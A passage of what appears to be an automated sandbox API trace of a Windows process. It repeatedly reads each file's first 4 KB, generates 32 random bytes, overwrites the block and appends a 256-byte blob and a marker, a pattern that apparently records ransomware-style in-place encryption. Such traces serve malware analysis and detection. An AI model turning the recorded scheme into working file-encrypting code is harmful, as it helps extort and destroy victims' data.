(in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.701] GetProcessHeap () returned 0x4f10000 [0084.701] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.702] SetFilePointerEx (in: hFile=0x994, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.702] WriteFile (in: hFile=0x994, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0084.702] WriteFile (in: hFile=0x994, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.702] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.702] GetProcessHeap () returned 0x4f10000 [0084.703] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.703] GetProcessHeap () returned 0x4f10000 [0084.703] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.703] CloseHandle (hObject=0x994) returned 1 [0084.704] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 135 [0084.704] SetFilePointerEx (in: hFile=0x998, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.704] ReadFile (in: hFile=0x998, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.704] SetFilePointerEx (in: hFile=0x998, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.704] GetProcessHeap () returned 0x4f10000 [0084.704] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.704] GetProcessHeap () returned 0x4f10000 [0084.704] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.704] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.704] GetProcessHeap () returned 0x4f10000 [0084.704] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.704] ReadFile (in: hFile=0x998, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.751] SetFilePointerEx (in: hFile=0x998, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.751] WriteFile (in: hFile=0x998, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.752] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.752] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.753] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.753] GetProcessHeap () returned 0x4f10000 [0084.754] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.754] GetProcessHeap () returned 0x4f10000 [0084.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.755] GetProcessHeap () returned 0x4f10000 [0084.755] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.756] SetFilePointerEx (in: hFile=0x998, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.756] WriteFile (in: hFile=0x998, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0084.756] WriteFile (in: hFile=0x998, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.756] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.756] GetProcessHeap () returned 0x4f10000 [0084.757] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.757] GetProcessHeap () returned 0x4f10000 [0084.757] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.757] CloseHandle (hObject=0x998) returned 1 [0084.759] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 136 [0084.759] SetFilePointerEx (in: hFile=0x99c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.759] ReadFile (in: hFile=0x99c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.759] SetFilePointerEx (in: hFile=0x99c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.759] GetProcessHeap () returned 0x4f10000 [0084.759] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.759] GetProcessHeap () returned 0x4f10000 [0084.759] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.759] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.759] GetProcessHeap () returned 0x4f10000 [0084.759] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.759] ReadFile (in: hFile=0x99c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.819] SetFilePointerEx (in: hFile=0x99c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.819] WriteFile (in: hFile=0x99c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.819] GetProcessHeap () returned 0x4f10000 [0084.819] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: 